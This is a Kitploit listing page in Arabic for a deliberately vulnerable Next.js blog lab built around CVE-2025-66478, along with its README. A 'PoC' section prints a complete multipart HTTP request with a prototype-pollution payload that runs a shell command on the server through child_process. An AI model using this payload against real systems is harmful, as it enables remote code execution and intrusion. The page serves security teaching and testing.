Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-66478_rce_vulnerable — مهم: مشروع Next JS قابل للاختراق أُنشئ فقط لأغراض تعليمية واختبارية واستغلالية، لا يُنصح بتثبيته في بيئة الإنتاج، فقط للبيئة المحلية أو بيئة خاضعة للرقابة. | Kitploit
أدوات/GitHubGitHub/letalandroid/cve-2025-66478_rce_vulnerable
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubletalandroid/cve-2025-66478_rce_vulnerable

cve-2025-66478_rce_vulnerable

مهم: مشروع Next JS قابل للاختراق أُنشئ فقط لأغراض تعليمية واختبارية واستغلالية، لا يُنصح بتثبيته في بيئة الإنتاج، فقط للبيئة المحلية أو بيئة خاضعة للرقابة.

عرض المستودعالموقع الإلكتروني
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مدونة حديثة مع shadcn/ui

مدونة حديثة وأنيقة مبنية باستخدام Next.js 16 وReact 19 وshadcn/ui وTailwind CSS.

مهم:

مشروع Next.js قابل للاختراق أُنشئ فقط لأغراض تعليمية واختبارية واستغلالية، لا يُنصح بتثبيته في بيئة الإنتاج، بل فقط في النطاق المحلي أو بيئة خاضعة للتحكم

PoC

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

المرجع: github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478

الميزات

  • 🎨 تصميم حديث: واجهة أنيقة مبنية باستخدام shadcn/ui
  • 📝 مدونة كاملة: مقالات متعددة بمحتوى تجريبي (mock)
  • 💬 نظام تفاعلات: تفاعل مع المنشورات بمشاعر مختلفة (إعجاب، حب، ضحك، واو، حزن، غضب)
  • 👤 المصادقة: نظام تسجيل وتسجيل دخول باستخدام localStorage
  • 🎯 متجاوب: تصميم متجاوب بالكامل
  • 🌙 الوضع الداكن: دعم للوضع الداكن التلقائي

التقنيات

  • Next.js 16 - إطار عمل React
  • React 19 - مكتبة واجهات المستخدم
  • shadcn/ui - مكونات واجهة مستخدم حديثة
  • Tailwind CSS 4 - أنماط أدوات مساعدة
  • TypeScript - كتابة ثابتة
  • Lucide React - أيقونات
  • Radix UI - مكونات قابلة للوصول

التثبيت

  1. ثبّت التبعيات:
root@kitploit:~
npm install
# o
yarn install
# o
pnpm install
  1. شغّل خادم التطوير:
root@kitploit:~
npm run dev
# o
yarn dev
# o
pnpm dev
  1. افتح http://localhost:3000 في متصفحك.

هيكل المشروع

root@kitploit:~
├── app/                    # Páginas de Next.js
│   ├── blog/[id]/         # Página de detalle del blog
│   ├── profile/            # Página de perfil
│   ├── layout.tsx          # Layout principal
│   └── page.tsx            # Página principal
├── components/             # Componentes React
│   ├── auth/              # Componentes de autenticación
│   ├── blog/              # Componentes del blog
│   ├── layout/             # Componentes de layout
│   └── ui/                 # Componentes shadcn/ui
├── lib/                    # Utilidades y servicios
│   ├── auth.ts            # Servicio de autenticación
│   ├── mocks.ts           # Datos mock
│   └── utils.ts           # Utilidades generales
└── public/                 # Archivos estáticos

الوظائف

المصادقة

  • تسجيل مستخدمين جدد
  • تسجيل الدخول
  • التخزين في localStorage
  • ملف تعريف المستخدم

المدونة

  • قائمة المقالات في الصفحة الرئيسية
  • صفحة تفاصيل لكل مقال
  • معلومات المؤلف
  • التصنيفات والوسوم
  • صور الغلاف

التفاعلات

  • عرض جميع تفاعلات المنشور
  • التفاعل بمشاعر مختلفة
  • عدّاد التفاعلات حسب النوع
  • قائمة المستخدمين الذين تفاعلوا

بيانات Mock

جميع البيانات (المدونات، المستخدمون، التفاعلات) هي Mock بالكامل وتُولَّد ديناميكيًا. لا يتطلب الأمر قاعدة بيانات.

ملاحظات

  • تُخزَّن بيانات اعتماد المستخدم في localStorage
  • تُعاد توليد البيانات عند كل إعادة تحميل للصفحة
  • نظام التفاعلات مرئي فقط (لا يحفظ التفاعلات الجديدة)

الترخيص

هذا المشروع مخصص للأغراض التعليمية فقط.

تنزيل الأداة